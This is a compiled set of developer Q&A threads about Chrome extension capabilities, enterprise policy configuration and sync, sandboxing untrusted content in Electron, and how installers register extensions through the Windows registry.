How to change Chromium configs through extension - google-chrome-extension

I need some advice about Chromium extension possibilities. Can the extension change configs of the browser such as: home page, default behavior for protocol handlers (tel, mailto), security settings ("protect from dangerous websites" for example), disable sending statistics to Google, etc.?
Which configs from chrome://settings/ can be changed and how to do it if it's possible?

The Chrome API index is a good place to start.
From it, you can glean the following capabilities:
accessibilityFeatures API that deals with accessibility settings.
browsingData API that deals with clearing browsing data.
contentSettings API that deals with allowed content, site permissions and plugins.
downloads API can at least partially influence download settings.
fontSettings API can manage fonts used by Chrome.
management API can manage (but not install) other extensions.
privacy API deals with privacy-related settings (that includes some security settings).
proxy API can manage proxy settings.
In addition, there's a lot of Chrome OS specific APIs I won't list here.
There are also some manifest keys that can influence Chrome settings on install - such as the home page. See chrome_settings_overrides (note: not available on Linux) and to a lesser extent Override Pages.
See also Protecting user settings on Windows with the new Settings API (which announced the above).
Other than those, no, you can't override Chrome settings. You cannot dynamically change the home or search provider, you can't control protocol handlers (that's on OS level anyway), etc.
Note that you can't inject scripts into chrome://* pages, so you won't be able to just fiddle with the UI.

Related

Security Implications in Electron as a Web Browser

I asked this question a little over a week ago on the Atom forums (link below), and didn't receive a response, so I am reposting it here in the hopes that someone may be able to provide insight on my problem.
Recently, I have taken up an open source project which uses Electron as it’s front-end. This project has two requirements: it must be cross-platform, and it must have an embedded web browser (which should be able to browse the web and render content like a typical browser). Considering the rather large footprint Electron has already netted my application, it seems like a bad idea to attempt to use another embedded web framework alongside it. So, in the interest of simplifying my project and retaining the UI built on top of Electron, I am looking into using Electron itself as the web browser. Here’s where I’ve come into a problem.
In a security page for Electron’s documentation, it is explicitly stated that,
it is important to understand … Electron is not a web browser
This quote comes within the context that Electron–or rather the code running on top of it–carries the unique ability to interact with the user’s operating system, unlike typical web applications. The page goes on to say,
displaying arbitrary content from untrusted sources poses a severe security risk that Electron is not intended to handle
At this point, I was tempted to give up on the idea of using Electron as an inbuilt browser, but further down on that same page, you can find another very interesting tidbit:
To display remote content, use the <webview> tag or BrowserView , [and] make sure to disable the nodeIntegration and enable contextIsolation
Link: https://electronjs.org/docs/tutorial/security#isolation-for-untrusted-content
First, in regard to using webviews, Electron’s own documentation recommends outright avoiding them:
Electron’s webview tag is based on Chromium’s webview , which is undergoing dramatic architectural changes. This impacts the stability of webviews , including rendering, navigation, and event routing. We currently recommend to not use the webview tag and to consider alternatives, like iframe , Electron’s BrowserView , or an architecture that avoids embedded content altogether.
Link: https://electronjs.org/docs/api/webview-tag
Seeing as though I cannot avoid embedded content, I opted to look into using a BrowserView, but what I found was not very motivating either. The advice, as it stands, is to do two things:
disable nodeIntegration
enable contextIsolation
After looking at the security and best-practices page, I will also append the following steps:
deny session permission requests from remote content (webcam, microphone, location, etc.)
catch webview elements in creation and strip default privileges
disable the creation of new windows
disable the remote module
That is a fair amount of steps to undergo in securing external content. Not to mention, there were several additional warnings scattered through the best practices page such as the following:
(On verifying webview options before creation)
Again, this list merely minimizes the risk, it does not remove it. If your goal is to display a website, a browser will be a more secure option.
Link: https://electronjs.org/docs/tutorial/security#11-verify-webview-options-before-creation
(On disabling the remote module)
However, if your app can run untrusted content and even if you sandbox your renderer processes accordingly, the remote module makes it easy for malicious code to escape the sandbox and have access to system resources via the higher privileges of the main process.
Link: https://electronjs.org/docs/tutorial/security#15-disable-the-remote-module
Not to mention, upon navigation to the BrowserView page, the whole class is listed as experimental.
This all isn’t even to mention the added attack surface created by Electron, such as a vulnerability in the webview component just last year: CVE-2018-1000136
Now, taking into account all of the above, numerous developers have still opted to create web browsers that routinely consume external and uncontrolled content using Electron.
Browser’s using Electron (linked directly from Electron’s website):
https://electronjs.org/apps/wexond
https://electronjs.org/apps/dot
https://electronjs.org/apps/beaker-browser
To me, it seems irresponsible to submit users to the above security implications as a trade-off for convenience.
That being said, my question is: can you safely, to the point at which you could ensure the integrity of your users, implement web browsing capabilities for uncontrolled content using Electron?
Thank you for your time.
Link to the original post:
https://discuss.atom.io/t/security-implications-in-electron-as-a-web-browser/70653
Some ideas that don't fit into a comment box:
[the project] must have an embedded web browser
So I presume then that this project isn't just a web browser. There's other content there that may have access to Node, but you just want the embedded-web-browser portion of it to be sandboxed appropriately, right?
Regarding the comments about <webview>, yes, it is considered unstable and Electron recommends using a BrowserView instead. I don't think that the fact that it's marked as "experimental" should necessarily deter you from using it (especially considering that the Electron team is recommending it [though maybe as the best of two evils]).
Experimental doesn't imply it's unstable. It can just mean that the Electron team is experimenting with this approach, but this approach may change in the future (at which point I would expect Electron to provide a transition path forward). Though this is one possible interpretation and ultimately Electron would have to comment on this.
The advice... is to do two things:
disable nodeIntegration
enable contextIsolation
I would also make use of the sandbox option inherited from BrowserWindows. BrowserView's docs on the constructor options say:
webPreferences Object (optional) - See BrowserWindow.
which tells me that BrowserView accepts the same options as BrowserWindow.
You would set it up like so:
new BrowserView({ webPreferences: {
sandbox: true,
nodeIntegration: false,
contextIsolation: true,
preload: "./pathToPreloadScript.js"
}});
See more information about this approach here. The preload script is what would expose some Node IPC APIs to the sandboxed content you're loading. Note the Status section at the bottom, which says:
Please use the sandbox option with care, as it is still an experimental feature. We are still not aware of the security implications of exposing some Electron renderer APIs to the preload script
If the content you're loading in the BrowserView never needs to communicate back to the application, then you don't need a preload script at all and can just sandbox the BrowserView.
After looking at the security and best-practices page, I will also append the following steps:
deny session permission requests from remote content (webcam, microphone, location, etc.)
catch webview elements in creation and strip default privileges
disable the creation of new windows
disable the remote module
Sure, those sound reasonable. Note that if your embedded browser needs to be able to open new windows (via window.open or <a target="_blank" />) then you'd have to allow popups.
That is a fair amount of steps to undergo in securing external content.
Sure, but is your main concern with the security of the app, or with how much work it takes to make it secure? Browser developers need to consider similar things to ensure webpages can't get access to the OS. It's just part of the game.
Again, this list merely minimizes the risk, it does not remove it. If your goal is to display a website, a browser will be a more secure option.
This is just saying that if all you're trying to do is display a website, then just use a browser since that's what they're there for.
If you need to do other things, well then you can't use a browser, so you'll have to make your own app, making sure it's reasonably secure.
I think that if you follow what's recommended in the Security document and keep up to date with new Electron releases, then you're doing the best you can do.
As for whether that's good enough, I can't say. It depends on what you're developing and what you're trying to protect against.
However, my thoughts can't substitute the more expert opinions of those on the Electron team. This question could certainly use some guidance from them.

Centralized configuration of settings for a Google Chrome Extension?

We'd like to develop a Google Chrome extension that is managed centrally, e.g. by MS Active Directory Group Policies.
How do we centrally distribute domain/customer specific configuration for such an extension?
Our users are mostly Windows users in the same domain, but we can not assume that they're logged in to any particular G-Suite organisation.
It does seem possible to create Active Directory Group Policies to install a particular extension for all users. That same article does however say:
Unfortunately I was not able to come up with a solution concerning the centralized management of Chrome extension settings. Some extensions, for example The Great Suspender, come with additional options for the user to configure. As said, I was not able to find a way how to manage or configure these centrally.
So now that the extension is installed, how do we configure it?
Since it is our own extension, there is more freedom. I'm thinking with a Group Policy, one could install C:\some\extension-file.json and then run
google-chrome --headless file:///some/extension-file.json
If the extension intercepts that (as e.g. ViolentMonkey does) but only if it is a file:// URL, I guess that could be brought to work. But I'm hoping: Can you come up with something more elegant?
How do we centrally distribute domain/customer specific configuration for such an extension?
chrome.storage.managed is the specific answer for that need. Quoting the docs:
Enterprise policies configured by the administrator for the extension can be read (using storage.managed with a schema).
With that in mind, you have to do the following:
Provide a schema for the storage via the storage.managed_schema key in the manifest. An example is given in the documentation.
Present values expected by the schema via GPO / registry as described in admin docs.
You can verify that the policy-mandated values are loaded by observing chrome://policy.
You can then use chrome.storage.managed as you would any other chrome.storage (though it is read-only), including watching for changes with onChanged.

Do Chrome extensions have access to Chrome apps?

For security considerations I am wondering if Chrome extensions had access to an app. I design a Chrome App which handles sensitive data. As far as I understand it, that app runs in a sandboxed environment which should be fairly isolated. If a user had by mistake installed a malicious Chrome extension, would that extension be able to intercept/modify any of the sensitive data in the app?
Please note that I do not consider other ways of interceptions outside of the Chrome environment, e.g. some virus that allows someone to get root access or alike. I would just like to understand to what degree a Chrome app is more susceptible to interception than a standard stand-alone application.
Sebastian
On one hand, extensions cannot touch your app's windows (as in, inspection / script injection) in the default environment, even with "debugger" permission. Your "local" data should be safe.
On the other, I tested it and conclude that webRequest API will catch all XHRs you send.
This includes headers for both request and response, and request body. Response body is currently not available for inspection; however, a malicious extension can perform a redirect, modify your request or cancel it.
This was deemed a security issue; as of Chrome 45, extensions can no longer intercept traffic from other extensions and apps. Hosted apps were accidentally included too, but it's a bug that will be fixed soon - traffic from hosted apps will be open to webRequest as normal.
I don't know any other possibility for an extension to snoop on an app (without any anomalous chrome://flag configuration).
Extensions or other apps cannot access data inside other extensions or apps. An exception may be data in the syncFileSystem api, since an extension could be granted access to the user's Gdrive.

Forcing disable of Google Account synchronization of extension on a per-extension basis

We have authored a Chrome extension and would like to ensure that our extension does not at any time participate in being sync'd using Google Account synchronization, even if the user has specified in the Advanced sync settings dialog that extensions be sync'd. Is there a way to prevent this sync'ing on a per-extension basis? Is there some setting we could place in the extension manifest file to accomplish this? Or other way to accomplish this?
If that is not possible, can we force the Extensions checkbox to always be unchecked and unalterable by the user, using enterprise-level techniques such as Group Policy Update? This is not optimal, since we only want to stop the sync'ing of our extension, and not prevent sync'ing of all extensions.
We do see that the SyncDisabled policy registry setting is available to us, but that looks like it will disable ALL data synchronization including Apps, Extensions, Settings, History, etc. This is even less desirable to us, since we don't want to affect other synchronization -- we just want to prevent only our extension from being sync'd.
The use case for this involves the following:
A corporate user installs Chrome on his work computer. Our extension is useful in the enterprise environment and is installed on Chrome.
At some point, using the Chrome browser, this user logs into his personal Gmail account. He has set up his Google Account to turn synchronization on.
Now when this user, using his home computer and Chrome browser, logs in to Google, he will find that our extension has also been installed on his Chrome browser at home -- this is not desirable, since our extension has no usefulness in the home environment. Moreover, the user may consider the presence of our extension an unwanted intrusion into his home computing environment.
The only remedy for this user would seem to be that he could go to the Advanced sync settings and uncheck the Extensions checkbox, but then he would lose the benefit of extension sync'ing of other extensions, which he may want.
Well, if you're doing it in a corporate / managed environment, you don't need to publish your extension on Web Store at all (thus preventing the sync) if you can use Group Policy.
Any extension in ExtensionInstallForcelist will be installed even if it (and its update manifest) is hosted outside Web Store. This will prevent the extension itself from syncing (though will probably still allow chrome.storage.sync to function for it, which is a plus).
Other than that, I don't think there's a way to prevent an individual Store-hosted extension from syncing.

How do third party installer install addons in our browser?

My question is how do third party installer installs addons in the browser like toolbars and able to set homepage and other browser properties??
I want to make an addon which get installed in browser in same way..
is it possible??
In principle, installing extensions along with other software is possible. I'm describing the procedure for Windows.
The following conditions have to be met:
You must be able to write to the HKLM registry subtree (needs Admin rights)
The extension must be published on Chrome Web Store
The machine must be able to download the extension from Web Store
If those conditions are met, you can do it according to the procedure described here. Basically, the installer must create a registry key that will trigger Chrome to download the extension on next launch.
That said, Google has gone to great pains to prevent silent installs and avoid browser settings hijack. Such setting overrides are a weapons race and Chrome is tightening its defenses. Ask yourself whether it's ethical to install your extension this way.
It will probably annoy your users and will flag your extension for more meticulous checks by Google. Remember that Google can disable any extension hosted by the Web Store if it violates its policies.
Also, be mindful of the single purpose policy. A toolbar that also overrides search/homepage/settings will be frowned upon. At a minimum it should be separated into several extensions, at a maximum - don't do it.
An extension can override, say, a homepage, but it's very restrictive. The extension must be in the Web Store as above, and any override pages must be verified for ownership for the Web Store developer account. All in the name of security and comfort of the users.

Resources